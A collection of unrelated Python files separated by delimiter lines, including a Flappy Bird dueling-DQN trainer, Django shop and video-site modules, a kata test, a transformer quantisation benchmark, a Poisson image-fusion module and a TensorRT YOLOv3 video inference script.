self.score = self.playerIndex = self.loopIter = 0
self.playerx = int(SCREENWIDTH * 0.2)
self.playery = int((SCREENHEIGHT - PLAYER_HEIGHT) / 2)
self.basex = 0
self.baseShift = IMAGES['base'].get_width() - BACKGROUND_WIDTH
newPipe1 = getRandomPipe()
newPipe2 = getRandomPipe()
self.upperPipes = [
{'x': SCREENWIDTH, 'y': newPipe1[0]['y']},
{'x': SCREENWIDTH + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
]
self.lowerPipes = [
{'x': SCREENWIDTH, 'y': newPipe1[1]['y']},
{'x': SCREENWIDTH + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
]
# player velocity, max velocity, downward accleration, accleration on flap
self.pipeVelX = -4
self.playerVelY = 0 # player's velocity along Y, default same as playerFlapped
self.playerMaxVelY = 10 # max vel along Y, max descend speed
self.playerMinVelY = -8 # min vel along Y, max ascend speed
self.playerAccY = 1 # players downward accleration
self.playerFlapAcc = -9 # players speed on flapping
self.playerFlapped = False # True when player flaps
def frame_step(self, input_actions):
pygame.event.pump()
reward = 0.1
terminal = False
if sum(input_actions) != 1:
raise ValueError('Multiple input actions!')
# input_actions[0] == 1: do nothing
# input_actions[1] == 1: flap the bird
if input_actions[1] == 1:
if self.playery > -2 * PLAYER_HEIGHT:
self.playerVelY = self.playerFlapAcc
self.playerFlapped = True
# check for score
playerMidPos = self.playerx + PLAYER_WIDTH / 2
for pipe in self.upperPipes:
pipeMidPos = pipe['x'] + PIPE_WIDTH / 2
if pipeMidPos <= playerMidPos < pipeMidPos + 4:
self.score += 1
reward = 1
# playerIndex basex change
if (self.loopIter + 1) % 3 == 0:
self.playerIndex = next(PLAYER_INDEX_GEN)
self.loopIter = (self.loopIter + 1) % 30
self.basex = -((-self.basex + 100) % self.baseShift)
# player's movement
if self.playerVelY < self.playerMaxVelY and not self.playerFlapped:
self.playerVelY += self.playerAccY
if self.playerFlapped:
self.playerFlapped = False
self.playery += min(self.playerVelY, BASEY - self.playery - PLAYER_HEIGHT)
if self.playery < 0:
self.playery = 0
# move pipes to left
for uPipe, lPipe in zip(self.upperPipes, self.lowerPipes):
uPipe['x'] += self.pipeVelX
lPipe['x'] += self.pipeVelX
# add new pipe when first pipe is about to touch left of screen
if 0 < self.upperPipes[0]['x'] < 5:
newPipe = getRandomPipe()
self.upperPipes.append(newPipe[0])
self.lowerPipes.append(newPipe[1])
# remove first pipe if its out of the screen
if self.upperPipes[0]['x'] < -PIPE_WIDTH:
self.upperPipes.pop(0)
self.lowerPipes.pop(0)
# check if crash here
isCrash= checkCrash({'x': self.playerx, 'y': self.playery,
'index': self.playerIndex},
self.upperPipes, self.lowerPipes)
if isCrash:
terminal = True
#self.__init__()
reward = -1
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
for uPipe, lPipe in zip(self.upperPipes, self.lowerPipes):
SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
SCREEN.blit(IMAGES['base'], (self.basex, BASEY))
# print score so player overlaps the score
# showScore(self.score)
SCREEN.blit(IMAGES['player'][self.playerIndex],
(self.playerx, self.playery))
image_data = pygame.surfarray.array3d(pygame.display.get_surface())
pygame.display.update()
FPSCLOCK.tick(FPS)
return image_data, reward, terminal
def getRandomPipe():
"""returns a randomly generated pipe"""
# y of gap between upper and lower pipe
gapYs = [20, 30, 40, 50, 60, 70, 80, 90]
index = random.randint(0, len(gapYs)-1)
gapY = gapYs[index]
gapY += int(BASEY * 0.2)
pipeX = SCREENWIDTH + 10
return [
{'x': pipeX, 'y': gapY - PIPE_HEIGHT}, # upper pipe
{'x': pipeX, 'y': gapY + PIPEGAPSIZE}, # lower pipe
]
def checkCrash(player, upperPipes, lowerPipes):
"""returns True if player collders with base or pipes."""
pi = player['index']
player['w'] = IMAGES['player'][0].get_width()
player['h'] = IMAGES['player'][0].get_height()
# if player crashes into ground
if player['y'] + player['h'] >= BASEY - 1:
return True
else:
playerRect = pygame.Rect(player['x'], player['y'],
player['w'], player['h'])
for uPipe, lPipe in zip(upperPipes, lowerPipes):
# upper and lower pipe rects
uPipeRect = pygame.Rect(uPipe['x'], uPipe['y'], PIPE_WIDTH, PIPE_HEIGHT)
lPipeRect = pygame.Rect(lPipe['x'], lPipe['y'], PIPE_WIDTH, PIPE_HEIGHT)
# player and upper/lower pipe hitmasks
pHitMask = HITMASKS['player'][pi]
uHitmask = HITMASKS['pipe'][0]
lHitmask = HITMASKS['pipe'][1]
# if bird collided with upipe or lpipe
uCollide = pixelCollision(playerRect, uPipeRect, pHitMask, uHitmask)
lCollide = pixelCollision(playerRect, lPipeRect, pHitMask, lHitmask)
if uCollide or lCollide:
return True
return False
def pixelCollision(rect1, rect2, hitmask1, hitmask2):
"""Checks if two objects collide and not just their rects"""
rect = rect1.clip(rect2)
if rect.width == 0 or rect.height == 0:
return False
x1, y1 = rect.x - rect1.x, rect.y - rect1.y
x2, y2 = rect.x - rect2.x, rect.y - rect2.y
for x in range(rect.width):
for y in range(rect.height):
if hitmask1[x1+x][y1+y] and hitmask2[x2+x][y2+y]:
return True
return False
"""# DQN Model"""
import torch
import torch.nn.functional as F
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def weights_init(layer):
if isinstance(layer, torch.nn.Conv2d) or isinstance(layer, torch.nn.Linear):
#torch.nn.init.kaiming_normal_(layer.weight, mode='fan_in', nonlinearity='relu')
torch.nn.init.normal_(layer.weight, mean = 0., std = 0.01)
layer.bias.data.fill_(0.01)
class DQN_net(torch.nn.Module):
def __init__(self, in_channels = 4, out_actions = 2):
super(DQN_net, self).__init__()
self.conv1 = torch.nn.Conv2d(in_channels, 32, kernel_size = 8, stride = 4, padding = 2)
self.conv2 = torch.nn.Conv2d(32, 64, kernel_size = 4, stride = 2, padding = 1)
self.conv3 = torch.nn.Conv2d(64, 64, kernel_size = 3, stride = 1, padding = 1)
# State Value Stream
self.state_fc1 = torch.nn.Linear(6400, 512)
self.state_fc2 = torch.nn.Linear(512, 1)
# Action Advantage
self.action_fc1 = torch.nn.Linear(6400, 512)
self.action_fc2 = torch.nn.Linear(512, out_actions)
def forward(self, x):
# (84, 84, 4)
x = F.relu(self.conv1(x)) # (10, 10, 32)
x = F.relu(self.conv2(x)) # (5, 5, 64)
x = F.relu(self.conv3(x)) # (5, 5, 64)
x = x.reshape(-1, 6400) # (1, 6400)
# State Value Stream
state_x = F.relu(self.state_fc1(x)) # (1, 512)
state_x = self.state_fc2(state_x) # (1, 1)
# Action Advantage
action_x = F.relu(self.action_fc1(x)) # (1, 512)
action_x = self.action_fc2(action_x) # (1, 2)
# Combine both to Q(s, a)
B = action_x.shape[0]
output_x = state_x + (action_x - torch.mean(action_x, dim = -1).reshape(B, 1))
return output_x
"""# Replay Memory"""
class ReplayMemory:
def __init__(self, capacity):
self.capacity = capacity
self.container = []
def store(self, transition):
self.container.append(transition)
if len(self.container) > self.capacity:
del self.container[0]
def sample(self, batch_size):
return random.sample(self.container, batch_size)
def __len__(self):
return len(self.container)
"""# DQN Training Object"""
class DQN:
STACK_FRAMES = 4
def __init__(self, memory_capacity, batch_size, epsilon, explore, replace_period, alpha, gamma, num_frames, num_actions):
# Hyper-parameters
self.replace_period = replace_period
self.replace_counter = 1
self.epsilon = epsilon
self.epsilon_step = (epsilon - 0.0001) / explore
self.alpha = alpha
self.gamma = gamma
# NN, loss, optimizer
self.policy_net = DQN_net(num_frames, num_actions).to(device)
self.target_net = DQN_net(num_frames, num_actions).to(device)
self.policy_net.apply(weights_init)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.loss_function = torch.nn.MSELoss().to(device)
self.optimizer = torch.optim.Adam(self.policy_net.parameters(), lr = self.alpha)
# Replay Memory
self.replay_memory = ReplayMemory(memory_capacity)
self.batch_size = batch_size
def train(self):
# Sample transition
batch = self.replay_memory.sample(self.batch_size)
state, action, reward, state_, terminal = zip(*batch)
state = torch.tensor(state, dtype = torch.float32, requires_grad = True, device = device).reshape(self.batch_size, STACK_FRAMES, 80, 80)
action = torch.cat(action).to(device)
reward = torch.tensor(reward, dtype = torch.float32, requires_grad = False, device = device).reshape(self.batch_size, 1)
state_ = torch.tensor(state_, dtype = torch.float32, requires_grad = False, device = device).reshape(self.batch_size, STACK_FRAMES, 80, 80)
# (R + gamma * Q_) - Q
Q = self.policy_net(state).gather(dim = 1, index = action.view(-1, 1))
Q_ = self.target_net(state_).max(dim = 1)[0].view(-1, 1)
TD_target = torch.zeros(self.batch_size, 1).to(device)
# G = reward + self.gamma * Q_
for i in range(self.batch_size):
if not terminal[i]:
TD_target[i, 0] = reward[i, 0] + self.gamma * Q_[i, 0]
else:
TD_target[i, 0] = reward[i, 0]
# TD_target[terminal == False, 0] = G[terminal == False, 0]
# TD_target[terminal == True, 0] = reward[terminal == True, 0]
# loss
loss = self.loss_function(Q, TD_target)
# Optimize
self.optimizer.zero_grad()
loss.backward()
for param in self.policy_net.parameters():
param.grad.data.clamp_(-1, 1)
self.optimizer.step()
if self.replace_counter % self.replace_period == 0:
self.update_target_net()
self.replace_counter = 1
self.replace_counter += 1
def choose_action(self, obs, is_train = True):
if is_train:
if random.random() > self.epsilon:
return self.policy_net(obs).max(dim = 1)[1]
else:
return torch.tensor([random.randint(0, 1)], dtype = torch.int64, device = device)
else:
return self.policy_net(obs).max(dim = 1)[1]
def memory_store(self, transition):
self.replay_memory.store(transition)
def update_epsilon(self):
if self.epsilon > 0.0001:
self.epsilon -= self.epsilon_step
def update_target_net(self):
print('Update Target Net')
self.target_net.load_state_dict(self.policy_net.state_dict())
def load_model(self, PATH):
checkpoint = torch.load(PATH)
self.policy_net.load_state_dict(checkpoint['policy_net_state_dict'])
self.target_net.load_state_dict(checkpoint['target_net_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
self.epsilon = checkpoint['epsilon']
return checkpoint['episode'], checkpoint['iterations']
def save_model(self, episode, iterations):
torch.save({
'episode': episode,
'iterations': iterations,
'policy_net_state_dict': self.policy_net.state_dict(),
'target_net_state_dict': self.target_net.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'epsilon': self.epsilon
}, './new_dueling_checkpoint' + str(episode) + '.tar')
"""# DQN Process
"""
OBSERVE = 10000
EXPLORE = 3000000
EPISODE = 1000000
ACTION_IDLE = 1
SAVE_ITER = 5000
STACK_FRAMES = 4
LOAD = False
# Initialize Game
game = GameState()
episode = 1
iterations = 0
# Initialize Model
if not LOAD:
dqn = DQN(memory_capacity = 50000,
batch_size = 32,
epsilon = 0.1,
explore = EXPLORE,
replace_period = 5000,
alpha = 1e-6,
gamma = 0.99,
num_frames = STACK_FRAMES,
num_actions = 2)
elif LOAD:
dqn = DQN(memory_capacity = 50000,
batch_size = 32,
epsilon = 0.1,
explore = EXPLORE,
replace_period = 5000,
alpha = 1e-6,
gamma = 0.99,
num_frames = STACK_FRAMES,
num_actions = 2)
# Populate
ckpts = [3883, 3981, 4079, 4174, 4271, 4366, 4464, 4561, 4659, 4756]
for ckpt in ckpts:
dqn.load_model('./dueling_checkpoint' + str(ckpt) + '.tar')
print('Start Populating by Model: ', ckpt)
for ep in range(50):
game.__init__()
R = 0
obs, reward, terminal = game.frame_step(np.array([1, 0]))
obs = cv2.cvtColor(cv2.resize(obs, (80, 80)), cv2.COLOR_BGR2GRAY)
_, obs = cv2.threshold(obs, 1, 255, cv2.THRESH_BINARY)
obs = np.reshape(obs, (1, 80, 80))
obs = np.concatenate([obs] * STACK_FRAMES, axis = 0)
while not terminal:
# Choose actions
if iterations % ACTION_IDLE == 0:
obs_tmp = torch.tensor(obs, dtype = torch.float32, device = device).reshape(1, STACK_FRAMES, 80, 80)
action = dqn.choose_action(obs_tmp, True)
else:
action = torch.tensor(0, dtype = torch.int64, device = device)
# Get next state
if action.cpu().numpy()[0] == 0:
act = np.array([1, 0])
elif action.cpu().numpy()[0] == 1:
act = np.array([0, 1])
obs_, reward, terminal = game.frame_step(act)
obs_ = cv2.cvtColor(cv2.resize(obs_, (80, 80)), cv2.COLOR_BGR2GRAY)
_, obs_ = cv2.threshold(obs_, 1, 255, cv2.THRESH_BINARY)
obs_ = np.reshape(obs_, (1, 80, 80))
obs_ = np.concatenate([obs_, obs[:3, ...]], axis = 0)
# Push transition to replay memory
transition = [obs, action, reward, obs_, terminal]
dqn.memory_store(transition)
# Update
obs = obs_
R += reward
print('Episode: {}, Total Reward: {}'.format(ep, R))
print('Start training by Model: ', 4850)
episode, iterations = dqn.load_model('./dueling_checkpoint' + str(4850) + '.tar')
while episode <= EPISODE:
game.__init__()
R = 0
# Get the first frame and stack it 4 times
obs, reward, terminal = game.frame_step(np.array([1, 0]))
obs = cv2.cvtColor(cv2.resize(obs, (80, 80)), cv2.COLOR_BGR2GRAY)
_, obs = cv2.threshold(obs, 1, 255, cv2.THRESH_BINARY)
obs = np.reshape(obs, (1, 80, 80))
obs = np.concatenate([obs] * STACK_FRAMES, axis = 0)
while not terminal:
# Choose actions
if iterations % ACTION_IDLE == 0:
obs_tmp = torch.tensor(obs, dtype = torch.float32, device = device).reshape(1, STACK_FRAMES, 80, 80)
action = dqn.choose_action(obs_tmp)
else:
action = torch.tensor(0, dtype = torch.int64, device = device)
# Get next state
if action.cpu().numpy()[0] == 0:
act = np.array([1, 0])
elif action.cpu().numpy()[0] == 1:
act = np.array([0, 1])
obs_, reward, terminal = game.frame_step(act)
obs_ = cv2.cvtColor(cv2.resize(obs_, (80, 80)), cv2.COLOR_BGR2GRAY)
_, obs_ = cv2.threshold(obs_, 1, 255, cv2.THRESH_BINARY)
obs_ = np.reshape(obs_, (1, 80, 80))
obs_ = np.concatenate([obs_, obs[:3, ...]], axis = 0)
# Push transition to replay memory
transition = [obs, action, reward, obs_, terminal]
dqn.memory_store(transition)
# Train
if iterations > OBSERVE:
dqn.update_epsilon()
dqn.train()
# Update
obs = obs_
iterations += 1
R += reward
if iterations % SAVE_ITER == 0 and iterations > OBSERVE:
dqn.save_model(episode, iterations)
print('Episode: {}, Total Reward: {}, Iterations: {}, Epsilon: {}, Memory Size: {}'.format(episode, R, iterations, dqn.epsilon, len(dqn.replay_memory)))
episode += 1
|
import unittest
from katas.kyu_7.katastrophe import strong_enough
class StrongEnoughTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(strong_enough(
[[2, 3, 1], [3, 1, 1], [1, 1, 2]], 2), 'Safe!')
def test_equals_2(self):
self.assertEqual(strong_enough(
[[5, 8, 7], [3, 3, 1], [4, 1, 2]], 2), 'Safe!')
def test_equals_3(self):
self.assertEqual(strong_enough(
[[5, 8, 7], [3, 3, 1], [4, 1, 2]], 3), 'Needs Reinforcement!')
|
from django.contrib import admin
from .models import *
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
search_fields = ('title', 'description', 'specification')
admin.site.register(Brand)
admin.site.register(Products, ProductAdmin)
admin.site.register(Reviews)
admin.site.register(BuyCart)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('analyst', '0003_auto_20150405_2031'),
]
operations = [
migrations.AddField(
model_name='dataset',
name='content',
field=models.TextField(default=123),
preserve_default=False,
),
]
|
import os
import sys
import glob
import shutil
import ntpath
import subprocess
from pathlib import Path
from zipfile import ZipFile
pkg_root = os.getenv("GITHUB_WORKSPACE")
if not pkg_root:
pkg_root = os.getcwd()
dest_root = os.path.join(pkg_root, 'public')
#clear out the assets folder
shutil.rmtree(os.path.join(dest_root,'assets'), ignore_errors=True)
#Move static assets
Path(dest_root, 'assets').mkdir(parents=True, exist_ok=False)
data_files = ['design-patterns/cloudformation/lab.yaml',
'design-patterns/cloudformation/UserData.sh',
'event-driven/event-driven-cfn.yaml',
'static/files/hands-on-labs/migration-env-setup.yaml',
'static/files/hands-on-labs/migration-dms-setup.yaml']
for inp_file in data_files:
src_file = os.path.join(pkg_root, inp_file)
head, tail = ntpath.split(src_file)
dst_file = os.path.join(dest_root, 'assets', tail or ntpath.basename(head))
shutil.copyfile(src_file, dst_file)
#Create workshop ZIP
os.chdir(os.path.join(pkg_root, 'design-patterns'))
with ZipFile('workshop.zip', 'w') as workshop_zip:
for py_script in glob.glob('./*.py'):
workshop_zip.write(py_script)
for txt_script in glob.glob('./*.txt'):
workshop_zip.write(txt_script)
for js_script in glob.glob('./*.json'):
workshop_zip.write(js_script)
for data_file in glob.glob('./data/*.csv'):
workshop_zip.write(data_file)
shutil.move(os.path.join(os.getcwd(), 'workshop.zip'), os.path.join(dest_root, 'assets', 'workshop.zip'))
#Create solution ZIP
os.chdir(os.path.join(pkg_root, 'scenario-solutions'))
with ZipFile('scenario-solutions.zip', 'w') as workshop_zip:
for scenario1 in glob.glob('./retail-cart/*'):
workshop_zip.write(scenario1)
for scenario2 in glob.glob('./bank-payments/*'):
workshop_zip.write(scenario2)
shutil.move(os.path.join(os.getcwd(), 'scenario-solutions.zip'), os.path.join(dest_root, 'assets', 'scenario-solutions.zip'))
#Create Event Driven ZIPs
zips_to_make = ['MapLambdaPackage', 'ReduceLambdaPackage', 'StateLambdaPackage', 'GeneratorLambdaPackage']
for zip_name in zips_to_make:
os.chdir(os.path.join(pkg_root, 'event-driven', zip_name))
zip_file_name = "{}.zip".format(zip_name)
with ZipFile(zip_file_name, 'w') as workshop_zip:
for python_script in glob.glob("./*.py".format(zip_name)):
head, tail = ntpath.split(python_script)
workshop_zip.write(python_script, tail)
shutil.move(os.path.join(os.getcwd(), zip_file_name), os.path.join(dest_root, 'assets', zip_file_name))
exit()
|
#!/usr/bin/env python3
# Create a program that generates random sequences in FASTA format
# Each name should be unique
# Length should have a minimum and maximum
# GC% should be a parameter
# Use assert() to check bounds of command line values
# When creating sequences, append and join
# Command line:
# python3 rand_seq.py <# of seqs> <min> <max> <gc>
"""
python3 rand_seq.py 3 10 20 0.5
>seq-0
GCGCGACCTTAT
>seq-1
ATCCTAGAAGT
>seq-2
CTTCGCTCGTG
"""
|
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from shop import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.cart_checker, name='cartChecker'),
path('home', views.home, name='home'),
path('addProduct/<int:id>', views.add_product, name='addProduct'),
path('removeProduct/<int:id>', views.remove_product, name='removeProduct'),
path('decreaseItem/<int:id>', views.decrease_item, name='decreaseItem'),
path('checkout', views.checkout, name='checkOut'),
path('pdf/<int:id>', views.convert_to_pdf, name='pdf'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import torch
import transformers
import turbo_transformers
from turbo_transformers.layers.utils import convert2tt_tensor, try_convert, convert_returns_as_type, ReturnType
import time
cfg = transformers.BertConfig()
model = transformers.BertModel(cfg)
model.eval()
torch.set_grad_enabled(False)
intermediate = torch.quantization.quantize_dynamic(model.encoder.layer[0].intermediate)
qintermediate = turbo_transformers.QBertIntermediate.from_torch(model.encoder.layer[0].intermediate)
lens = [10,20,40,60,80,100,200,300]
loops = 1
for l in lens:
input = torch.rand(1, l, 768)
print("seq length =", l)
start = time.time()
for i in range(loops):
res = intermediate(input)
end = time.time()
print("torch int8 layer QPS =", loops/(end-start))
start = time.time()
for i in range(loops):
res2 = qintermediate(input)
end = time.time()
print("turbo int8 layer QPS =", loops/(end-start))
assert torch.max(torch.abs(res-res2)) < 1e-3
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=150)
passwordQuestion = models.CharField(max_length=150)
passwordQuestionAnswer = models.CharField(max_length=150)
# phone = models.CharField(max_length=15)
# gender = models.CharField(max_length=10)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
class Video(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
title = models.CharField(max_length=150)
description = models.TextField()
pub_date = models.DateTimeField(auto_now_add=True)
thumbnail = models.FileField(blank=True)
filepath = models.FileField()
filterpath = models.FileField(blank=True)
|
import numpy as np
import scipy.sparse
import imgpr.utils as utils
from .model import FusionModel
delta = [(1, 0), (-1, 0), (0, 1), (0, -1)]
delta8 = [(1, 0), (-1, 0), (0, 1), (0, -1), (-1, -1), (-1, 1), (1, -1), (1, 1)]
def is_edge(x, y, mask):
if mask[x, y] == 0:
return 0
ret = 0
for dx, dy in delta:
if mask[dx + x, dy + y] == 0:
ret += 1
return ret
def get_sparse_matrix(mask_indicies, edge):
size = len(mask_indicies)
map_indicies = {}
for i in range(size):
map_indicies[mask_indicies[i]] = i
mat = scipy.sparse.lil_matrix((size, size))
for i in range(size):
if edge[i] < 0:
mat[i, i] = 1
else:
x, y = mask_indicies[i]
mat[i, i] = 4
for dx, dy in delta:
tx, ty = dx + x, dy + y
index = map_indicies.get((tx, ty))
if index is not None:
mat[i, index] = -1
return mat
class PoissonFusion(FusionModel):
def _init(self, source, mask):
self._channels = source.shape[-1]
mask[0, :] = 0
mask[:, 0] = 0
mask[-1, :] = 0
mask[:, -1] = 0
self._source = source
self._mask = mask
non_zero = np.nonzero(mask)
mask_indicies = list(zip(*non_zero))
self._mask_indicies = np.array(mask_indicies)
self._edge = np.array([is_edge(x, y, mask) for x, y in self._mask_indicies])
self._sparse_matrix = get_sparse_matrix(mask_indicies, self._edge)
self._cg_matrix = []
for channel in range(self._channels):
src = np.where(mask > 0, source[:, :, channel], 0)
mat = src[utils.xy2index(self._mask_indicies)] * 4
for dx, dy in delta:
indicies = self._mask_indicies + (dx, dy)
mat -= src[utils.xy2index(indicies)]
self._cg_matrix.append(mat)
def _run_fusion(self, image):
channels = image.shape[-1]
result = np.zeros_like(image)
for i in range(channels):
result[:, :, i] = self._run_channel(i, image[:, :, i])
return result.astype(int)
def _run_channel(self, channel, image):
assert(channel < self._channels)
edge = image[utils.xy2index(self._mask_indicies)]
source = self._source[:, :, channel]
edge2 = source[utils.xy2index(self._mask_indicies)]
mat = self._cg_matrix[channel] + (edge - edge2) * self._edge
# mat = np.where(self._edge > 0, edge, self._cg_matrix[channel])
mask = scipy.sparse.linalg.cg(self._sparse_matrix, mat)
result = np.zeros_like(image)
result[utils.xy2index(self._mask_indicies)] = mask[0]
return np.where(self._mask > 0, result, image).clip(0, 255)
|
#!/usr/bin/env python3
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import common
import os
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
from PIL import ImageDraw, Image
import argparse
import time
import cv2
from halo import Halo
from data_processing import PreprocessYOLO, PostprocessYOLO, ALL_CATEGORIES
import os
TRT_LOGGER = trt.Logger()
def draw_bboxes(image_raw, bboxes, confidences, categories, all_categories, bbox_color='blue'):
"""Draw the bounding boxes on the original input image and return it.
Keyword arguments:
image_raw -- a raw PIL Image
bboxes -- NumPy array containing the bounding box coordinates of N objects, with shape (N,4).
categories -- NumPy array containing the corresponding category for each object,
with shape (N,)
confidences -- NumPy array containing the corresponding confidence for each object,
with shape (N,)
all_categories -- a list of all categories in the correct ordered (required for looking up
the category name)
bbox_color -- an optional string specifying the color of the bounding boxes (default: 'blue')
"""
if any(param is None for param in [bboxes, confidences, categories]):
return image_raw
draw = ImageDraw.Draw(image_raw)
# print(bboxes, confidences, categories)
for box, score, category in zip(bboxes, confidences, categories):
x_coord, y_coord, width, height = box
left = max(0, np.floor(x_coord + 0.5).astype(int))
top = max(0, np.floor(y_coord + 0.5).astype(int))
right = min(image_raw.width, np.floor(
x_coord + width + 0.5).astype(int))
bottom = min(image_raw.height, np.floor(
y_coord + height + 0.5).astype(int))
draw.rectangle(((left, top), (right, bottom)), outline=bbox_color)
draw.text((left, top - 12),
'{0} {1:.2f}'.format(all_categories[category], score), fill=bbox_color)
return image_raw
def get_engine(onnx_file_path, engine_file_path=""):
"""Attempts to load a serialized engine if available, otherwise builds a new TensorRT engine and saves it."""
def build_engine():
"""Takes an ONNX file and creates a TensorRT engine to run inference with"""
with trt.Builder(TRT_LOGGER) as builder, builder.create_network(common.EXPLICIT_BATCH) as network, builder.create_builder_config() as config, trt.OnnxParser(network, TRT_LOGGER) as parser, trt.Runtime(TRT_LOGGER) as runtime:
config.max_workspace_size = 1 << 28 # 256MiB
builder.max_batch_size = 1
# Parse model file
if not os.path.exists(onnx_file_path):
print('ONNX file {} not found, please run yolov3_to_onnx.py first to generate it.'.format(
onnx_file_path))
exit(0)
print('Loading ONNX file from path {}...'.format(onnx_file_path))
with open(onnx_file_path, 'rb') as model:
print('Beginning ONNX file parsing')
if not parser.parse(model.read()):
print('ERROR: Failed to parse the ONNX file.')
for error in range(parser.num_errors):
print(parser.get_error(error))
return None
# The actual yolov3.onnx is generated with batch size 64. Reshape input to batch size 1
network.get_input(0).shape = [1, 3, 608, 608]
print('Completed parsing of ONNX file')
print('Building an engine from file {}; this may take a while...'.format(
onnx_file_path))
plan = builder.build_serialized_network(network, config)
engine = runtime.deserialize_cuda_engine(plan)
print("Completed creating Engine")
with open(engine_file_path, "wb") as f:
f.write(plan)
return engine
if os.path.exists(engine_file_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_file_path))
with open(engine_file_path, "rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
else:
return build_engine()
def convertCV2PIL(image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
return image
def convertPIL2CV(image):
image = np.array(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
return image
def main():
"""Create a TensorRT engine for ONNX-based YOLOv3-608 and run inference."""
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--onnx', type=str,
help="File path to the onnx model")
parser.add_argument('-e', '--engine', type=str,
help="File path to store the engine")
parser.add_argument('-v', '--video', type=str,
help="Path to the video file")
parser.add_argument('-f', '--frame', type=int,
help="Number of frames to run the script")
parser.add_argument('-s', '--save', type=str, default="result.mp4", help="Path to save the output result")
args = parser.parse_args()
# Try to load a previously generated YOLOv3-608 network graph in ONNX format:
# onnx_file_path = 'yolov3.onnx'
# engine_file_path = "yolov3.trt"
onnx_file_path = args.onnx
engine_file_path = args.engine
# Two-dimensional tuple with the target network's (spatial) input resolution in HW ordered
input_resolution_yolov3_HW = (608, 608)
# Create a pre-processor object by specifying the required input resolution for YOLOv3
preprocessor = PreprocessYOLO(input_resolution_yolov3_HW)
postprocessor_args = {"yolo_masks": [(6, 7, 8), (3, 4, 5), (0, 1, 2)], # A list of 3 three-dimensional tuples for the YOLO masks
"yolo_anchors": [(10, 13), (16, 30), (33, 23), (30, 61), (62, 45), # A list of 9 two-dimensional tuples for the YOLO anchors
(59, 119), (116, 90), (156, 198), (373, 326)],
# Threshold for object coverage, float value between 0 and 1
"obj_threshold": 0.6,
# Threshold for non-max suppression algorithm, float value between 0 and 1
"nms_threshold": 0.5,
"yolo_input_resolution": input_resolution_yolov3_HW}
postprocessor = PostprocessYOLO(**postprocessor_args)
# Output shapes expected by the post-processor
output_shapes = [(1, 30, 19, 19), (1, 30, 38, 38), (1, 30, 76, 76)]
# Do inference with TensorRT
# trt_outputs = []
input_video = cv2.VideoCapture(args.video)
frame_width = input_video.get(cv2.CAP_PROP_FRAME_WIDTH)
frame_height =input_video.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_size = (int(frame_width), int(frame_height))
if os.path.exists(args.save):
print(f"Removing the already existing the {args.save}")
os.remove(args.save)
input_video_fps = int(input_video.get(cv2.CAP_PROP_FPS))
output_video_writer = cv2.VideoWriter(
args.save, cv2.VideoWriter_fourcc(*'MP4V'), input_video_fps, frame_size)
frame_count = 0
# testing row major
with get_engine(onnx_file_path, engine_file_path) as engine, engine.create_execution_context() as context:
inputs, outputs, bindings, stream = common.allocate_buffers(engine)
with Halo(spinner="dots", text="loading frames") as sp:
while True:
ret, frame = input_video.read()
if ret:
frame_count += 1
image = convertCV2PIL(frame)
image_raw, image = preprocessor.process_image(image)
# Store the shape of the original input image in WH format, we will need it for later
shape_orig_WH = image_raw.size
# Set host input to the image. The common.do_inference function will copy the input to the GPU before executing.
inputs[0].host = image
# starting the timer
start = time.time()
trt_outputs = common.do_inference_v2(context, bindings=bindings, inputs=inputs, outputs=outputs, stream=stream)
# Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
trt_outputs = [output.reshape(shape) for output, shape in zip(
trt_outputs, output_shapes)]
# Run the post-processing algorithms on the TensorRT outputs and get the bounding box details of detected objects
boxes, classes, scores = postprocessor.process(
trt_outputs, (shape_orig_WH))
# ending of the timer
end = time.time()
inference_fps = round(1 / (end - start), 2)
sp.text = f"Frame {frame_count} Inference Fps {inference_fps}"
# Draw the bounding boxes onto the original input image and save it as a PNG file
obj_detected_img = draw_bboxes(
image_raw, boxes, scores, classes, ALL_CATEGORIES)
detection = convertPIL2CV(obj_detected_img)
cv2.putText(detection, f"Input FPS: {input_video_fps} | Inference FPS {inference_fps}", (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
output_video_writer.write(detection)
